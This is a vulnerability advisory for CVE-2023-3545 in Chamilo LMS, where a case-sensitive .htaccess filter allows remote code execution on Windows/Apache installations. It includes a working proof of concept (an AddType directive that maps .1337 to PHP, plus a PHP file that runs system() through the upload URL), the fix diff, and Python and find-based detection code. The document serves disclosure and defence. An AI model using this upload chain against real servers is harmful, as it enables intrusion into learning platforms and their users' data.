Product | Chamilo |
---|---|
Vendor | Chamilo |
Severity | High - Adversaries may exploit software vulnerabilities to obtain unauthenticated remote code execution. |
Affected Versions | <= v1.11.20 |
Tested Versions | v1.11.20 (latest version as of writing) |
CVE Identifier | CVE-2023-3545 |
CVE Description | Improper sanitisation in main/inc/lib/fileUpload.lib.php in Chamilo LMS <= v1.11.20 on Windows and Apache installations allows unauthenticated attackers to bypass file upload security protections and obtain remote code execution via uploading of .htaccess file. This vulnerability may be exploited by privileged attackers or chained with unauthenticated arbitrary file write vulnerabilities, such as CVE-2023-3533, to achieve remote code execution. |
CWE Classification(s) | CWE-178: Improper Handling of Case Sensitivity |
CAPEC Classification(s) | CAPEC-650: Upload a Web Shell to a Web Server |
Base Score: 9.8 (Critical)
Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:N/C:H/I:H/A:H
Metric | Value |
---|---|
Attack Vector (AV) | Network |
Attack Complexity (AC) | Low |
Privileges Required (PR) | None |
User Interaction (UI) | None |
Scope (S) | Unchanged |
Confidentiality (C) | High |
Integrity (I) | High |
Availability (A) | High |
Chamilo is an open-source PHP-based Learning Management System (LMS) that facilitates online education and training. It offers features such as course creation, content management, assessments, collaboration and delivering educational resources.
The `htaccess2txt()` function in `main/inc/lib/fileUpload.lib.php` does not correctly prevent the upload of valid `.htaccess` files on Windows systems. Consequently, an unauthenticated attacker can chain this vulnerability with an unauthenticated arbitrary file write vulnerability, such as CVE-2023-3533, to achieve remote code execution.
The relevant vulnerable code in `main/inc/lib/fileUpload.lib.php` is shown below:

```php
function htaccess2txt($filename)
{
    return str_replace(['.htaccess', '.HTACCESS'], ['htaccess.txt', 'htaccess.txt'], $filename);
}
```
Observe that the replacement of `.htaccess` and `.HTACCESS` is case-sensitive: only those two exact spellings are renamed to `htaccess.txt`. By default, filenames on Windows systems are case-insensitive, so any other capitalised variant of `.htaccess` is still treated by Apache as a valid `.htaccess` file.
Some examples of filenames that pass the check but are still valid `.htaccess` files on Windows:

- `.Htaccess`
- `.HTaccess`
- `.htAccess`
Consequently, an authenticated attacker with Trainer role can exploit this vulnerability to obtain remote code execution.
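To make the case-sensitivity gap concrete, the following Python script (an added example, not Chamilo's code) ports the vulnerable `htaccess2txt()` logic and a case-insensitive counterpart, then reports which of the names above would still be treated as an effective `.htaccess` file after sanitisation. The `is_effective_htaccess()` model assumes Apache's default `AccessFileName` of `.htaccess`; the `case_insensitive_fs` flag stands in for Windows (True) versus a typical UNIX filesystem (False).

```python
import re

# Port of the vulnerable Chamilo htaccess2txt() (<= v1.11.20): only the two
# exact spellings '.htaccess' and '.HTACCESS' are renamed; anything else passes.
def htaccess2txt_vulnerable(filename: str) -> str:
    return filename.replace(".htaccess", "htaccess.txt").replace(".HTACCESS", "htaccess.txt")


# Case-insensitive rename, the Python equivalent of PHP's str_ireplace() fix.
_HTACCESS_RE = re.compile(re.escape(".htaccess"), re.IGNORECASE)


def htaccess2txt_fixed(filename: str) -> str:
    return _HTACCESS_RE.sub("htaccess.txt", filename)


def is_effective_htaccess(filename: str, case_insensitive_fs: bool) -> bool:
    """Would Apache (default AccessFileName '.htaccess') read this file as .htaccess?

    On a case-insensitive filesystem such as NTFS, any capitalisation of the
    name resolves to the same file; on a case-sensitive one only the exact
    spelling counts.
    """
    if case_insensitive_fs:
        return filename.lower() == ".htaccess"
    return filename == ".htaccess"


def bypassing_names(candidates, sanitizer, case_insensitive_fs=True):
    """Return the candidate names that survive `sanitizer` as an effective .htaccess."""
    return [n for n in candidates if is_effective_htaccess(sanitizer(n), case_insensitive_fs)]


# Constructed sample: the two spellings the old code handles plus the mixed-case
# variants listed in the advisory.
CANDIDATES = [".htaccess", ".HTACCESS", ".Htaccess", ".HTaccess", ".htAccess"]

if __name__ == "__main__":
    print("vulnerable, Windows :", bypassing_names(CANDIDATES, htaccess2txt_vulnerable))
    print("vulnerable, UNIX    :", bypassing_names(CANDIDATES, htaccess2txt_vulnerable, False))
    print("fixed, Windows      :", bypassing_names(CANDIDATES, htaccess2txt_fixed))
```

Running it shows that the vulnerable sanitiser lets the three mixed-case names through on a case-insensitive filesystem, lets nothing through on a case-sensitive one (which is why the issue is specific to Windows), and that the case-insensitive replacement closes the gap on both.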
A trainer can upload a valid `.htaccess` file containing an `AddType` directive that makes Apache treat an arbitrary file extension as a PHP script:

```apache
AddType application/x-httpd-php .1337
```

Then, upload a PHP file with the `.1337` extension and visit `http(s)://<chamilo>/app/courses/<course_id>/document/<filename>` to execute the uploaded file as a PHP script.
However, the maximum impact is unauthenticated remote code execution on Windows with Apache installations, as this vulnerability may also be chained with CVE-2023-3533 (unauthenticated arbitrary file write).
For remote code execution to be possible, the following conditions must be satisfied:

- Chamilo is installed on Windows, where filenames are case-insensitive.
- Chamilo is served by Apache (with `.htaccess` processing).

An unauthenticated attacker may chain an unauthenticated arbitrary file write vulnerability, such as CVE-2023-3533, to achieve remote code execution. Alternatively, an authenticated attacker with Trainer role or above may exploit the vulnerability without chaining it with other vulnerabilities.
The following proof-of-concept demonstrates how the vulnerability in this report can be exploited by an authenticated attacker with Trainer role.

1. As a user with Trainer role in a course with code `TESTCOURSE`, navigate to `http://<chamilo>/main/document/upload.php?cidReq=TESTCOURSE`.
2. Upload a file named `.htAccess` with the following file contents:

   ```apache
   AddType application/x-httpd-php .1337
   ```

3. Upload a file named `rce.1337` with the following file contents:

   ```php
   <?php
   system("type C:\\Windows\\win.ini");
   ?>
   ```

4. Visit `http://<chamilo>/app/courses/TESTCOURSE/document/rce.1337`. Observe that the contents of `C:\Windows\win.ini` are returned, indicating that the attacker has successfully achieved remote code execution:
```ini
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
```
Ensure that the renaming of `.htaccess` to `htaccess.txt` is done case-insensitively. For example:
function htaccess2txt($filename)
{
- return str_replace(['.htaccess', '.HTACCESS'], ['htaccess.txt', 'htaccess.txt'], $filename);
+ return str_ireplace('.htaccess', 'htaccess.txt', $filename);
}
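Review bot: the `+ return str_ireplace('.htaccess', 'htaccess.txt', $filename);` line handles the mixed-case spellings listed above (`.Htaccess`, `.HTaccess`, `.htAccess`) in a single call, but the change ships without a regression test; add a unit test that feeds each of those variants through `htaccess2txt()` and asserts the result is `htaccess.txt`, so the case-sensitivity gap cannot be reintroduced unnoticed.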
End users are encouraged to update to the latest version of Chamilo.
It is possible to detect exploitation of this vulnerability by checking the web root and its subdirectories for suspicious `.htaccess` files (i.e. files whose name matches `.htaccess` case-insensitively but is neither `.htaccess` nor `.HTACCESS`). For example, the following command can be used on UNIX-based systems:

```shell
$ find . \( -iname '.htaccess' -a -not -name '.htaccess' -a -not -name '.HTACCESS' \)
```
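The same check as the `find` one-liner above, written as an added Python scanner (not part of this advisory or of Chamilo) so that it also runs on Windows, where the issue actually applies. It walks a web root, reports every file whose name matches `.htaccess` case-insensitively but is neither of the two spellings the old sanitiser renamed, and, going one step beyond the one-liner, lists handler-mapping directives (`AddType`, `AddHandler`, `SetHandler`) found inside each hit so a responder can see at a glance whether the file remaps extensions to a script handler. The directory tree produced by `build_sample_tree()` is constructed for the example and does not come from a real installation.

```python
import os
import tempfile
from pathlib import Path

# The two spellings that the vulnerable htaccess2txt() already renamed; a file
# that survived with either name is not evidence of this particular bypass.
SAFE_NAMES = {".htaccess", ".HTACCESS"}

# Apache directives that map file extensions (or whole directories) to handlers.
HANDLER_DIRECTIVES = ("AddType", "AddHandler", "SetHandler")


def find_suspicious_htaccess(root):
    """Return sorted paths under `root` whose basename is '.htaccess' ignoring case
    but is not one of the exact spellings in SAFE_NAMES (mirrors the find command)."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower() == ".htaccess" and name not in SAFE_NAMES:
                hits.append(os.path.join(dirpath, name))
    return sorted(hits)


def handler_directives(path):
    """Return the stripped lines in `path` that start with a handler-mapping directive."""
    out = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for line in fh:
            stripped = line.strip()
            if stripped.startswith(HANDLER_DIRECTIVES):
                out.append(stripped)
    return out


def build_sample_tree():
    """Constructed sample web root: one mixed-case .htAccess inside a course
    document folder, one harmless renamed htaccess.txt, and a legitimate
    top-level .htaccess. Returns the temporary root path."""
    root = tempfile.mkdtemp(prefix="chamilo_scan_")
    course = Path(root) / "app" / "courses" / "TESTCOURSE" / "document"
    course.mkdir(parents=True)
    (course / ".htAccess").write_text("AddType application/x-httpd-php .1337\n")
    (course / "htaccess.txt").write_text("AddType application/x-httpd-php .1337\n")
    (Path(root) / ".htaccess").write_text("RewriteEngine On\n")
    return root


if __name__ == "__main__":
    web_root = build_sample_tree()  # replace with the real web root when scanning
    for hit in find_suspicious_htaccess(web_root):
        print(hit)
        for directive in handler_directives(hit):
            print("    ", directive)
```

On a real host, call `find_suspicious_htaccess()` with the Chamilo web root instead of the sample tree; any hit under `app/courses/` deserves a look at its directives and at the upload logs for the course concerned.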
Ngo Wei Lin (@Creastery) of STAR Labs SG Pte. Ltd. (@starlabs_sg)